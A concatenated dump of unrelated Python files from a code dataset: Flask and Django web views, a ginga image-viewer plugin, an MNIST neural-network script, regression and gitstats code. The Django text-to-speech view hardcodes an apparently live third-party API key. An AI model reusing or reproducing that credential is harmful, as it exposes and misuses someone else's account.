self.app.test_client()\n # Crea un contexto de aplicación\n with self.app.app_context():\n # Crea las tablas de la base de datos\n db.create_all()\n self.init_users()\n self.init_motos()\n self.init_rentals()\n\n def tearDown(self):\n with self.app.app_context():\n # Elimina todas las tablas de la base de datos\n db.session.remove()\n db.drop_all()\n\n def init_users(self):\n user1 = UsersModel(mail='joanmartin123@gmail.com',\n google_token='juy65rfty76Hg65FVytfGGDD63ccxeDFg',\n role=0)\n user1.country = 'España'\n user1.id_bank_data = 1234567890123456\n user1.name = 'Joan'\n user1.surname = 'Martin'\n user1.national_id_document = '23432123P'\n user1.save_to_db()\n user2 = UsersModel(mail='joanmartin456@gmail.com',\n google_token='jug65FVytfGGDD63ccxeDFg',\n role=0)\n user2.country = 'España'\n user2.id_bank_data = 6543217890123456\n user2.name = 'Juan'\n user2.surname = 'Martínez'\n user2.national_id_document = '23845467M'\n user2.save_to_db()\n\n def init_motos(self):\n moto1 = MotosModel('1234AAA', 99, 42.1, 2.1)\n moto2 = MotosModel('4321AAA', 10, 42.0, 2.1)\n moto3 = MotosModel('5678AAA', 9, 42.1, 2.0)\n moto4 = MotosModel('8765AAA', 32, 42.0, 2.0)\n moto1.save_to_db()\n moto2.save_to_db()\n moto3.save_to_db()\n moto4.save_to_db()\n\n def init_rentals(self):\n rental1 = RentalsModel(1, 1, datetime.now().isoformat())\n rental1.save_to_db()\n","sub_path":"Backend/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"219531973","text":"#\n# Contents.py -- Table of Contents plugin for fits viewer\n#\n# This is open-source software licensed under a BSD license.\n# Please see the file LICENSE.txt for details.\n#\nfrom ginga.util.six import itervalues\nfrom ginga.util.six.moves import map\n\nfrom ginga import GingaPlugin\nfrom ginga.misc import Bunch\n\nfrom ginga.gw import Widgets\nimport time\n\n\nclass Contents(GingaPlugin.GlobalPlugin):\n \"\"\"\n Contents\n ========\n The Contents plugin provides a table of contents like interface for all\n the images viewed since the program was started. Unlike Thumbs,\n Contents is sorted by channel. The contents also shows some configurable\n metadata from the image.\n\n Plugin Type: Global\n -------------------\n Header is a global plugin. Only one instance can be opened.\n\n Usage\n -----\n Double-click on a column heading to sort the table by that column's\n value. The image in the currently focused channel will normally be\n highlighted. You can click on any image to force that image to be shown\n in the associated channel.\n \"\"\"\n def __init__(self, fv):\n # superclass defines some variables for us, like logger\n super(Contents, self).__init__(fv)\n\n columns = [ ('Name', 'NAME'), ('Object', 'OBJECT'),\n ('Date', 'DATE-OBS'), ('Time UT', 'UT'),\n ('Modified', 'MODIFIED')\n ]\n\n prefs = self.fv.get_preferences()\n self.settings = prefs.create_category('plugin_Contents')\n self.settings.add_defaults(columns=columns,\n always_expand=True,\n highlight_tracks_keyboard_focus=True,\n color_alternate_rows=True,\n row_font_color='green',\n max_rows_for_col_resize=100)\n self.settings.load(onError='silent')\n\n # For table-of-contents pane\n self.name_dict = Bunch.caselessDict()\n # TODO: this ought to be customizable by channel\n self.columns = self.settings.get('columns', columns)\n self.treeview = None\n # paths of highlighted entries, by channel\n self.highlight_tracks_keyboard_focus = self.settings.get(\n 'highlight_tracks_keyboard_focus', True)\n self._hl_path = set([])\n\n fv.add_callback('add-image', self.add_image_cb)\n fv.add_callback('add-image-info', self.add_image_info_cb)\n fv.add_callback('remove-image', self.remove_image_cb)\n fv.add_callback('add-channel', self.add_channel_cb)\n fv.add_callback('delete-channel', self.delete_channel_cb)\n fv.add_callback('channel-change', self.focus_cb)\n\n self.gui_up = False\n\n def build_gui(self, container):\n # create the Treeview\n always_expand = self.settings.get('always_expand', False)\n color_alternate = self.settings.get('color_alternate_rows', True)\n treeview = Widgets.TreeView(auto_expand=always_expand,\n sortable=True,\n use_alt_row_color=color_alternate)\n self.treeview = treeview\n treeview.setup_table(self.columns, 2, 'NAME')\n\n treeview.add_callback('selected', self.switch_image)\n container.add_widget(treeview, stretch=1)\n\n self.gui_up = True\n\n def stop(self):\n self.gui_up = False\n\n def switch_image(self, widget, res_dict):\n if len(res_dict) == 0:\n return\n chname = list(res_dict.keys())[0]\n img_dict = res_dict[chname]\n if len(img_dict) == 0:\n return\n imname = list(img_dict.keys())[0]\n bnch = img_dict[imname]\n if not 'path' in bnch:\n # may be a top-level channel node, e.g. in gtk\n return\n\n path = bnch.path\n self.logger.debug(\"chname=%s name=%s path=%s\" % (\n chname, imname, path))\n\n self.fv.switch_name(chname, imname, path=path,\n image_future=bnch.image_future)\n\n def get_info(self, chname, name, image, info):\n path = info.get('path', None)\n future = info.get('image_future', None)\n\n bnch = Bunch.Bunch(CHNAME=chname, imname=name, path=path,\n image_future=future)\n\n # Get header keywords of interest\n if image is not None:\n header = image.get_header()\n else:\n header = {}\n\n for hdr, key in self.columns:\n bnch[key] = str(header.get(key, 'N/A'))\n\n # name should always be available\n bnch.NAME = name\n\n # Modified timestamp will be set if image data is modified\n timestamp = info.time_modified\n if timestamp is not None:\n # Z: Zulu time, GMT, UTC\n timestamp = timestamp.strftime('%Y-%m-%d %H:%M:%SZ')\n bnch.MODIFIED = timestamp\n\n return bnch\n\n def recreate_toc(self):\n self.logger.debug(\"Recreating table of contents...\")\n self.treeview.set_tree(self.name_dict)\n\n # re-highlight as necessary\n if self.highlight_tracks_keyboard_focus:\n new_highlight = self._hl_path\n else:\n new_highlight = set([])\n for chname in self.name_dict:\n channel = self.fv.get_channel_info(chname)\n new_highlight |= channel.extdata.contents_old_highlight\n self.update_highlights(set([]), new_highlight)\n\n # Resize column widths\n n_rows = sum(map(len, self.name_dict.values()))\n if n_rows < self.settings.get('max_rows_for_col_resize', 100):\n self.treeview.set_optimal_column_widths()\n self.logger.debug(\"Resized columns for {0} row(s)\".format(n_rows))\n\n def is_in_contents(self, chname, imname):\n if not chname in self.name_dict:\n return False\n\n file_dict = self.name_dict[chname]\n if not imname in file_dict:\n return False\n\n return True\n\n def add_image_cb(self, viewer, chname, image, image_info):\n if not self.gui_up:\n return False\n\n name = image_info.name\n self.logger.debug(\"name=%s\" % (name))\n\n if image is not None:\n nothumb = image.get('nothumb', False)\n if nothumb:\n return\n\n bnch = self.get_info(chname, name, image, image_info)\n\n if not chname in self.name_dict:\n # channel does not exist yet in contents\n # Note: this typically shouldn't happen, because add_channel_cb()\n # will have added an empty dict\n file_dict = {}\n self.name_dict[chname] = file_dict\n else:\n file_dict = self.name_dict[chname]\n\n if not name in file_dict:\n # new image\n file_dict[name] = bnch\n else:\n # old image\n file_dict[name].update(bnch)\n\n # TODO: either make add_tree() merge updates or make an\n # update_tree() method--shouldn't need to recreate entire\n # tree, just add new entry and possibly rehighlight\n ## tree_dict = { chname: { name: bnch } }\n ## self.treeview.add_tree(tree_dict)\n self.recreate_toc()\n\n self.logger.debug(\"%s added to Contents\" % (name))\n\n def add_image_info_cb(self, viewer, channel, image_info):\n \"\"\"Almost the same as add_image_info(), except that the image\n may not be loaded in memory.\n \"\"\"\n chname = channel.name\n name = image_info.name\n self.logger.debug(\"name=%s\" % (name))\n\n # Updates of any extant information\n try:\n image = channel.get_loaded_image(name)\n except KeyError:\n # images that are not yet loaded will show \"N/A\" for keywords\n image = None\n\n self.add_image_cb(viewer, chname, image, image_info)\n\n def remove_image_cb(self, viewer, chname, name, path):\n if not self.gui_up:\n return False\n\n if chname not in self.name_dict:\n return\n\n file_dict = self.name_dict[chname]\n\n if name not in file_dict:\n return\n\n del file_dict[name]\n\n # Unhighlight\n channel = self.fv.get_channel_info(chname)\n key = (chname, name)\n self._hl_path.discard(key)\n channel.extdata.contents_old_highlight.discard(key)\n\n self.recreate_toc()\n self.logger.debug(\"%s removed from Contents\" % (name))\n\n def clear(self):\n self.name_dict = Bunch.caselessDict()\n self._hl_path = set([])\n self.recreate_toc()\n\n def add_channel_cb(self, viewer, channel):\n \"\"\"Called when a channel is added from the main interface.\n Parameter is a channel (a Channel object).\"\"\"\n chname = channel.name\n\n # add old highlight set to channel external data\n channel.extdata.setdefault('contents_old_highlight', set([]))\n\n # Add the channel to the treeview\n file_dict = {}\n self.name_dict.setdefault(chname, file_dict)\n\n if not self.gui_up:\n return False\n\n tree_dict = { chname: { } }\n self.treeview.add_tree(tree_dict)\n\n def delete_channel_cb(self, viewer, channel):\n \"\"\"Called when a channel is deleted from the main interface.\n Parameter is a channel (a Channel object).\"\"\"\n chname = channel.name\n del self.name_dict[chname]\n\n # Unhighlight\n un_hilite_set = set([])\n for path in self._hl_path:\n if path[0] == chname:\n un_hilite_set.add(path)\n self._hl_path -= un_hilite_set\n\n if not self.gui_up:\n return False\n self.recreate_toc()\n\n def _get_hl_key(self, chname, image):\n return (chname, image.get('name', 'none'))\n\n def _highlight_path(self, hl_path, tf):\n \"\"\"Highlight or unhighlight a single entry.\n\n Examples\n --------\n >>> hl_path = self._get_hl_key(chname, image)\n >>> self._highlight_path(hl_path, True)\n\n \"\"\"\n fc = self.settings.get('row_font_color', 'green')\n\n try:\n self.treeview.highlight_path(hl_path, tf, font_color=fc)\n except Exception as e:\n self.logger.error('Error changing highlight on treeview path '\n '({0}): {1}'.format(hl_path, str(e)))\n\n def update_highlights(self, old_highlight_set, new_highlight_set):\n \"\"\"Unhighlight the entries represented by ``old_highlight_set``\n and highlight the ones represented by ``new_highlight_set``.\n\n Both are sets of keys.\n\n \"\"\"\n un_hilite_set = old_highlight_set - new_highlight_set\n re_hilite_set = new_highlight_set - old_highlight_set\n\n # unhighlight entries that should NOT be highlighted any more\n for key in un_hilite_set:\n self._highlight_path(key, False)\n\n # highlight new entries that should be\n for key in re_hilite_set:\n self._highlight_path(key, True)\n\n def redo(self, channel, image):\n \"\"\"This method is called when an image is set in a channel.\"\"\"\n\n imname = image.get('name', 'none')\n chname = channel.name\n # is image in contents tree yet?\n in_contents = self.is_in_contents(chname, imname)\n\n # get old highlighted entries for this channel -- will be\n # an empty set or one key\n old_highlight = channel.extdata.contents_old_highlight\n\n # calculate new highlight keys -- again, an empty set or one key\n if image is not None:\n key = self._get_hl_key(chname, image)\n new_highlight = set([key])\n else:\n # no image has the focus\n new_highlight = set([])\n\n # Only highlights active image in the current channel\n if self.highlight_tracks_keyboard_focus:\n if in_contents:\n self.update_highlights(self._hl_path, new_highlight)\n self._hl_path = new_highlight\n\n # Highlight all active images in all channels\n else:\n if in_contents:\n self.update_highlights(old_highlight, new_highlight)\n channel.extdata.contents_old_highlight = new_highlight\n\n return True\n\n def focus_cb(self, viewer, channel):\n chname = channel.name\n image = channel.get_current_image()\n\n if image is not None:\n key = self._get_hl_key(chname, image)\n new_highlight = set([key])\n else:\n # no image has the focus\n new_highlight = set([])\n\n if self.highlight_tracks_keyboard_focus:\n self.update_highlights(self._hl_path, new_highlight)\n self._hl_path = new_highlight\n\n def __str__(self):\n return 'contents'\n\n#END\n","sub_path":"ginga/rv/plugins/Contents.py","file_name":"Contents.py","file_ext":"py","file_size_in_byte":12769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"628282893","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 4 23:12:33 2017\r\n\r\n@author: JSZJZ\r\n\"\"\"\r\n\r\n# Relu and Sigmoid # learning curve (speed)\r\n# learning cuve find the step size and mini-batch size (learning curve)\r\n# PCA and downsample - accuarcy and confused matrix\r\n# dropout for overfitting (training and validation) - learning curve and accuarcy\r\n# SGD and momentum for the local optima - accuarcy and matrix\r\n# output confused matrix and accuracy for the test datq - matrix and accuarcy\r\n\r\n\r\nimport numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nimport LoadMNIST as mn\r\nimport random\r\nfrom sklearn.decomposition import PCA\r\n\r\n\r\n#%%\r\nnew_row = 14\r\nnew_col = 14\r\nnew_dimensions = new_row*new_col\r\nshrink = int(math.sqrt(784/new_dimensions))\r\nbatch_size = 100\r\nhidden_dimensions = 100\r\noutput_dimensions = 10\r\niteration = 500\r\nstep = 0.005\r\nmoment = 0.2\r\nD1_before = 0\r\nD2_before = 0\r\nchoice = 2\r\ndropout = 0\r\nmo = 1\r\n\r\n# load data\r\nimages,labels = mn.load_mnist(dataset=\"training\", digits=np.arange(10), path=\"\", size = 60000)\r\ntesting_images,testing_labels = mn.load_mnist(dataset=\"testing\", digits=np.arange(10), path=\"\", size = 10000)\r\n# cross-validation\r\ntraining_images = images[0:50000,:,:]\r\nvalidation_images = images[50000:,:,:]\r\ntraining_labels = labels[0:50000]\r\nvalidation_labels = labels[50000:]\r\n# get length\r\nrow = training_images.shape[1]\r\ncolumn = training_images.shape[2]\r\ntraining_length = training_images.shape[0]\r\ntesting_length = testing_images.shape[0]\r\nvalidation_length = validation_images.shape[0]\r\nbatch_iteration = int(training_length/batch_size)\r\nBias_Input = np.ones([batch_size,1])\r\n\r\nw1 = np.random.randn(new_dimensions+1,hidden_dimensions)*0.1\r\nw2 = np.random.randn(hidden_dimensions+1,output_dimensions)*0.1\r\nfig = plt.figure(figsize = (10,60)) \r\n\r\n#%%\r\ndef ChangeLabelstoDec(labels,length):\r\n t = np.zeros([length,10])\r\n for i in range(length):\r\n index = round(labels[i])\r\n t[i,index] = 1\r\n return t\r\n\r\n#%%\r\n# sigma ReLu\r\ndef ReLu(x):\r\n return np.maximum(x, 0)\r\n \r\n# derivative sigma ReLu\r\ndef der_ReLu(x):\r\n return (x>0).astype(x.dtype)\r\n\r\ndef sig(x):\r\n t = (1/(1+np.exp(-x)))\r\n return t\r\n\r\n\r\ndef der_sig(x):\r\n t = (1/(1+np.exp(-x)))*(1-(1/(1+np.exp(-x))))\r\n return t\r\n\r\n\r\n#%%\r\ndef MLP(x,activation,dropout):\r\n global w1\r\n global w2\r\n xlength = x.shape[0]\r\n Bias = np.ones([xlength,1])\r\n if dropout == 1:\r\n w1 = 0.5*w1\r\n w2 = 0.5*w2\r\n Input = np.column_stack([Bias,x])\r\n Net1 = np.dot(Input,(w1))\r\n if activation == 0:\r\n hd_output = sig(Net1)\r\n else:\r\n if activation == 1:\r\n hd_output = ReLu(Net1)\r\n hd_input = np.column_stack([Bias,hd_output])\r\n Net2 = np.dot(hd_input,(w2))\r\n if activation == 0:\r\n Output = sig(Net2)\r\n else:\r\n if activation == 1: \r\n Output = ReLu(Net2)\r\n return Output\r\n \r\n\r\n#%%\r\ndef MLP_Learning(x,l,activation,step,dropout,momentum):\r\n global w1\r\n global w2\r\n global D1_before\r\n global D2_before\r\n global moment\r\n step1 = step\r\n step2 = step\r\n size = x.shape[0]\r\n Bias_Input = np.ones([size,1])\r\n Input = np.column_stack([Bias_Input,x])\r\n p = 0.5\r\n P = np.random.binomial([np.ones((size,hidden_dimensions))],p)[0]\r\n size = x.shape[0]\r\n Bias_Input = np.ones([size,1])\r\n Input = np.column_stack([Bias_Input,x])\r\n net1 = np.dot(Input,w1)\r\n if activation == 0:\r\n hd_output = sig(net1)\r\n else:\r\n if activation == 1:\r\n hd_output = ReLu(net1)\r\n if dropout == 1:\r\n hd_output = np.multiply(hd_output,P)\r\n hd_input = np.column_stack([Bias_Input,hd_output])\r\n \r\n net2 = np.dot(hd_input,w2)\r\n if activation == 0:\r\n Output = sig(net2) \r\n else:\r\n if activation == 1:\r\n Output = ReLu(net2) \r\n error = np.array(l-Output)\r\n \r\n # backpropagation\r\n if activation == 0:\r\n der_output = der_sig(net2)\r\n else:\r\n if activation == 1:\r\n der_output = der_ReLu(net2) \r\n delta_output = error*der_output\r\n D2 = (np.dot(hd_input.T,delta_output))/batch_size\r\n \r\n if activation == 0:\r\n der_hidden = der_sig(net1)\r\n else:\r\n if activation == 1:\r\n der_hidden = der_ReLu(net1) \r\n local_error = delta_output@w2[1:hidden_dimensions+1,:].T\r\n D1 = (Input.T@(local_error*der_hidden))/batch_size\r\n \r\n if momentum == 0:\r\n moment = 0\r\n w1 = w1 + step1*D1 - moment*D1_before\r\n w2 = w2 + step2*D2 - moment*D2_before\r\n D1_before = step1*D1\r\n D2_before = step2*D2\r\n return error\r\n\r\n#%%\r\ndef downsample(myarr,factor):\r\n ys,xs = myarr.shape\r\n crarr = myarr[:ys-(ys % int(factor)),:xs-(xs % int(factor))]\r\n dsarr = np.mean( np.concatenate([[crarr[i::factor,j::factor] \r\n for i in range(factor)] \r\n for j in range(factor)]), axis=0)\r\n return dsarr\r\n\r\n\r\n#%%\r\n# data process\r\nif new_dimensions == 784:\r\n training = np.reshape(training_images,(training_length,column*row))\r\n validation = np.reshape(validation_images,(validation_length,column*row))\r\n testing = np.reshape(testing_images,(testing_length,column*row))\r\n tr_labels = ChangeLabelstoDec(training_labels,training_length) \r\n va_labels = ChangeLabelstoDec(validation_labels,validation_length) \r\n te_labels = ChangeLabelstoDec(testing_labels,testing_length)\r\n p1 = fig.add_subplot(*[6,1,1])\r\n p1.imshow(training_images[0,:,:], cmap='gray')\r\n new_training = training/255\r\n new_validation = validation/255\r\n new_testing = testing/255\r\nelse:\r\n if choice == 1:\r\n training = np.array(np.reshape(training_images,(training_length,column*row)))\r\n validation = np.array(np.reshape(validation_images,(validation_length,column*row)))\r\n testing = np.reshape(testing_images,(testing_length,column*row))\r\n tr_labels = ChangeLabelstoDec(training_labels,training_length) \r\n va_labels = ChangeLabelstoDec(validation_labels,validation_length) \r\n te_labels = ChangeLabelstoDec(testing_labels,testing_length)\r\n whole_data = np.row_stack([training,validation])\r\n pca = PCA(n_components=new_dimensions,whiten=\"true\")\r\n whole_pca = pca.fit_transform(whole_data/255)\r\n new_training = whole_pca[0:50000,:]\r\n new_validation = whole_pca[50000:,:]\r\n display = np.around(np.reshape(new_training[0,:],(new_row,new_col))*255)\r\n p1 = fig.add_subplot(*[6,1,1])\r\n p1.imshow(display, cmap='gray')\r\n else:\r\n if choice == 2:\r\n new_training = np.zeros([training_length,new_row,new_col])\r\n new_validation = np.zeros([validation_length,new_row,new_col])\r\n new_testing = np.zeros([testing_length,new_row,new_col])\r\n for i in range(training_length):\r\n g = downsample(np.reshape(training_images[i,:,:],(row,column)),shrink)\r\n new_training[i,:,:] = np.reshape(g,(1,new_row,new_col))\r\n for i in range(validation_length):\r\n g = downsample(np.reshape(validation_images[i,:,:],(row,column)),shrink)\r\n new_validation[i,:,:] = np.reshape(g,(1,new_row,new_col))\r\n for i in range(testing_length):\r\n g = downsample(np.reshape(testing_images[i,:,:],(row,column)),shrink)\r\n new_testing[i,:,:] = np.reshape(g,(1,new_row,new_col))\r\n tr_labels = ChangeLabelstoDec(training_labels,training_length) \r\n va_labels = ChangeLabelstoDec(validation_labels,validation_length) \r\n te_labels = ChangeLabelstoDec(testing_labels,testing_length)\r\n p1 = fig.add_subplot(*[6,1,1])\r\n p1.imshow(new_training[0,:,:], cmap='gray')\r\n new_training = np.array(np.reshape(new_training,(training_length,new_col*new_row)))/255\r\n new_validation = np.array(np.reshape(new_validation,(validation_length,new_col*new_row)))/255\r\n new_testing = np.reshape(testing_images,(testing_length,column*row))/255\r\n \r\n#%%\r\np2 = fig.add_subplot(*[6,1,2])\r\nb = np.zeros(10)\r\nt = np.arange(iteration)\r\nJ = np.zeros(iteration)\r\nw1 = np.random.randn(new_dimensions+1,hidden_dimensions)*0.1\r\nw2 = np.random.randn(hidden_dimensions+1,output_dimensions)*0.1\r\nfor i in range(iteration):\r\n mini_t = np.zeros([batch_size,new_dimensions])\r\n mini_l = np.zeros([batch_size,output_dimensions])\r\n for k in range(batch_iteration):\r\n old_order = np.array(np.arange(0,batch_size,1))\r\n new_order = np.zeros(batch_size)\r\n new_order = random.sample(old_order.tolist(),batch_size)\r\n for j in range(batch_size):\r\n index = int(new_order[j])\r\n mini_t[j,:] = new_training[k*batch_size+index,:]\r\n mini_l[j,:] = tr_labels[k*batch_size+index,:]\r\n error = MLP_Learning(mini_t,mini_l,1,step,dropout,mo) \r\n J[i] = np.trace((error.T@error)/(2*validation_length))\r\nOut = MLP(new_validation,1,dropout)\r\nanswer = np.argmax(Out, axis=1)\r\ncount = 0\r\nfor j in range(validation_length):\r\n if answer[j] == validation_labels[j]:\r\n count = count + 1\r\naccuracy = count/validation_length\r\nprint(accuracy)\r\np2.plot(t,J,'b')\r\n \r\nw1 = np.random.randn(new_dimensions+1,hidden_dimensions)*0.1\r\nw2 = np.random.randn(hidden_dimensions+1,output_dimensions)*0.1\r\nmoment = 0\r\nstep = 0.05\r\nfor i in range(iteration):\r\n mini_t = np.zeros([batch_size,new_dimensions])\r\n mini_l = np.zeros([batch_size,output_dimensions])\r\n for k in range(batch_iteration):\r\n old_order = np.array(np.arange(0,batch_size,1))\r\n new_order = np.zeros(batch_size)\r\n new_order = random.sample(old_order.tolist(),batch_size)\r\n for j in range(batch_size):\r\n index = int(new_order[j])\r\n mini_t[j,:] = new_training[k*batch_size+index,:]\r\n mini_l[j,:] = tr_labels[k*batch_size+index,:]\r\n error = MLP_Learning(mini_t,mini_l,1,step,dropout,mo) \r\n J[i] = np.trace((error.T@error)/(2*validation_length))\r\nOut = MLP(new_validation,1,dropout)\r\nanswer = np.argmax(Out, axis=1)\r\ncount = 0\r\nfor j in range(validation_length):\r\n if answer[j] == validation_labels[j]:\r\n count = count + 1\r\naccuracy = count/validation_length\r\nprint(accuracy)\r\np2.plot(t,J,'r')","sub_path":"project/momentum3.py","file_name":"momentum3.py","file_ext":"py","file_size_in_byte":10287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"48384641","text":"from tkinter import N\nimport requests\nimport json\n\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\n\n\n@csrf_exempt\ndef text_to_speed(request):\n if (request.method == 'POST'):\n payload = request.body\n url = 'https://api.fpt.ai/hmi/tts/v5'\n\n headers = {\n 'api-key': 'cnnvqSxKkxOHXwJvkff681tgU7O8Gi0B',\n 'speed': '',\n 'voice': 'banmai'\n }\n\n response = requests.request('POST', url, data=payload, headers=headers)\n\n rs = json.loads(response.text)\n\n return JsonResponse(rs, safe=False)\n","sub_path":"tdai/api/views/view_fpt.py","file_name":"view_fpt.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"80241969","text":"# Polynomial Regression\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Importing the dataset\r\ndataset = pd.read_csv('Position_Salaries.csv')\r\nX = dataset.iloc[:, 1:2].values\r\ny = dataset.iloc[:, -1].values\r\n\r\n#building a simple linear reg model\r\nfrom sklearn.linear_model import LinearRegression\r\nlin_reg = LinearRegression()\r\nlin_reg.fit(X,y)\r\n\r\n#building a polynomial regression model\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg = PolynomialFeatures(degree = 4)\r\nX_poly = poly_reg.fit_transform(X)\r\nlin_reg2 = LinearRegression()\r\nlin_reg2.fit(X_poly,y) \r\n\r\n#visualizing the linear regression results\r\nplt.scatter(X,y, color = 'red')\r\nplt.plot(X,lin_reg.predict(X), color = 'blue')\r\nplt.title('Linear Regression Model')\r\nplt.xlabel('Experience')\r\nplt.ylabel('Salary')\r\nplt.show()\r\n\r\n#visualizing the polynomial regression results\r\nX_grid = np.arange(min(X), max(X), 0.1)\r\nX_grid = X_grid.reshape((len(X_grid), 1))\r\nplt.scatter(X,y, color = 'red')\r\nplt.plot(X,lin_reg2.predict(poly_reg.fit_transform(X)), color = 'blue')\r\nplt.title('Polynomial Regression Model')\r\nplt.xlabel('Experience')\r\nplt.ylabel('Salary')\r\nplt.show()\r\n\r\n#Predicting the result using lin reg\r\nlin_reg.predict([[9]]) #years of experience\r\n\r\n#Predicting the result using poly reg\r\nlin_reg2.predict(poly_reg.fit_transform([[9]]))\r\n","sub_path":"Final_polyreg.py","file_name":"Final_polyreg.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"88951384","text":"# -*- coding: utf-8 -*-\n\nfrom flask import request, g, current_app\nfrom flask_restplus import Namespace, Resource, abort\nfrom ..serializers.topics import topic_post_model, topic_put_model, topic_container_model, topic_model\nfrom app.models import Topic\nfrom app.extensions import db\n\n\nns = Namespace('topics', description='Topic related operation')\n\n\n# ================================================================================================\n# ENDPOINTS\n# ================================================================================================\n#\n# API topics endpoints\n#\n# ================================================================================================\n\n\n@ns.route('/')\nclass TopicCollection(Resource):\n\n @ns.marshal_with(topic_container_model)\n def get(self):\n \"\"\"\n Return topic list\n \"\"\"\n return {'topics': [t for t in Topic.query.all()]}\n\n @ns.marshal_with(topic_model)\n @ns.expect(topic_post_model)\n def post(self):\n \"\"\"\n Add topic\n \"\"\"\n data = request.json\n\n if Topic.query.filter_by(name=data['name']).first() is not None:\n abort(400, error='Name already exist')\n\n t = Topic(name=data['name'])\n db.session.add(t)\n db.session.commit()\n\n return t\n\n\n@ns.route('/')\n@ns.response(404, 'Topic not found.')\nclass TopicItem(Resource):\n\n @ns.marshal_with(topic_model)\n def get(self, id):\n \"\"\"\n Get topic\n \"\"\"\n return Topic.query.get_or_404(id)\n\n @ns.marshal_with(topic_model)\n @ns.expect(topic_put_model)\n def put(self, id):\n \"\"\"\n Update topic\n \"\"\"\n t = Topic.query.get_or_404(id)\n data = request.json\n\n ft = Topic.query.filter_by(name=data['name']).first()\n\n if ft.id != t.id:\n abort(400, error='Name already exist.')\n\n t.name = data['name']\n\n db.session.add(t)\n db.session.commit()\n\n return t\n\n @ns.response(204, 'Topic successfully deleted.')\n def delete(self, id):\n \"\"\"\n Delete topic\n \"\"\"\n t = Topic.query.get_or_404(id)\n\n db.session.delete(t)\n db.session.commit()\n\n return 'Topic successfully deleted.', 204\n","sub_path":"app/api/endpoints/topics.py","file_name":"topics.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"145837177","text":"from django.shortcuts import get_object_or_404, render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom .models import *\nfrom events.models import Event\nfrom aboutus.models import About\n# from .forms import *\n\n# Create your views here.\n\n\ndef home(request):\n\twelcome = Welcome.objects.order_by('-id')[:1]\n\tabouts = About.objects.order_by('-id')[:1]\n\tverse = Verse.objects.order_by('-id')[:1]\n\tpastors = Pastor.objects.order_by('id')[:3]\n\tevents = Event.objects.order_by('-id')[:1]\n\n\tif request.method == 'POST':\n\t\t# form = SubscribeForm(request.POST) \n\t\temail = request.POST['email']\n\t\t\n\t\temail = Subscribe.objects.create(email=email)\n\t\temail.save()\n\t\treturn HttpResponse('')\n\t# else:\n\t\t# form = SubscribeForm()\n\n\tcontext = {\n\t\t# 'form':form,\n\t\t'events' : events,\n\t\t'abouts' : abouts,\n\t\t'verse' : verse, \n\t\t'welcome' : welcome,\n\t\t'pastors' : pastors,\n\t\t'title': 'Home',\n\t}\n\treturn render(request, 'home.html', context)\n\ndef pastor(request, pastor_id):\n\tpastors = get_object_or_404(Pastor, pk=pastor_id)\n\tpastor = Pastor.objects.order_by('id')[:3]\n\n\tcontext = {\n\t\t'pastors' : pastors,\n\t\t'pastor' : pastor,\n\t\t'title' : 'Our leaders',\n\t}\n\treturn render(request, 'pastors.html', context)\n\n\n","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"491978422","text":"import re\n\nfrom gitstats.RunExternal import RunExternal\nfrom gitstats.collector.StatisticsCollector.StatisticsCollectorStrategy import StatisticsCollectorStrategy\nfrom gitstats.model.Author import Author\n\n\nclass AuthorStrategy(StatisticsCollectorStrategy):\n def __init__(self, data, conf):\n super().__init__(data, conf)\n\n def collect(self):\n # defined for stamp, author only if author committed at this timestamp.\n self.data.changes_by_date_by_author = {} # stamp -> author -> lines_added\n\n # Similar to the above, but never use --first-parent\n # (we need to walk through every commit to know who\n # committed what, not just through mainline)\n lines = RunExternal.execute(\n ['git log --shortstat --date-order --pretty=format:\"%%at %%aN\" %s' % (self.get_log_range('HEAD'))]).split(\n '\\n')\n lines.reverse()\n inserted = 0\n deleted = 0\n stamp = 0\n for line in lines:\n if len(line) == 0:\n continue\n\n # \n if re.search(r'files? changed', line) is None:\n pos = line.find(' ')\n if pos != -1:\n try:\n old_stamp = stamp\n (stamp, author_name) = (int(line[:pos]), line[pos + 1:])\n author_name = self.get_merged_author(author_name)\n if old_stamp > stamp:\n # clock skew, keep old timestamp to avoid having ugly graph\n stamp = old_stamp\n if author_name not in self.data.authors.keys():\n self.data.authors[author_name] = Author(author_name)\n author = self.data.authors[author_name]\n self.data.add_commit(author, stamp)\n author.lines_added += inserted\n author.lines_removed += deleted\n if stamp not in self.data.changes_by_date_by_author:\n self.data.changes_by_date_by_author[stamp] = {}\n if author not in self.data.changes_by_date_by_author[stamp]:\n self.data.changes_by_date_by_author[stamp][author] = {}\n self.data.changes_by_date_by_author[stamp][author]['lines_added'] = author.lines_added\n self.data.changes_by_date_by_author[stamp][author]['commits'] = author.commits\n files, inserted, deleted = 0, 0, 0\n except ValueError:\n print('Warning: unexpected line \"%s\"' % line)\n else:\n print('Warning: unexpected line \"%s\"' % line)\n else:\n numbers = self.get_stat_summary_counts(line)\n\n if len(numbers) == 3:\n (files, inserted, deleted) = [int(el) for el in numbers]\n else:\n print('Warning: failed to handle line \"%s\"' % line)\n (files, inserted, deleted) = (0, 0, 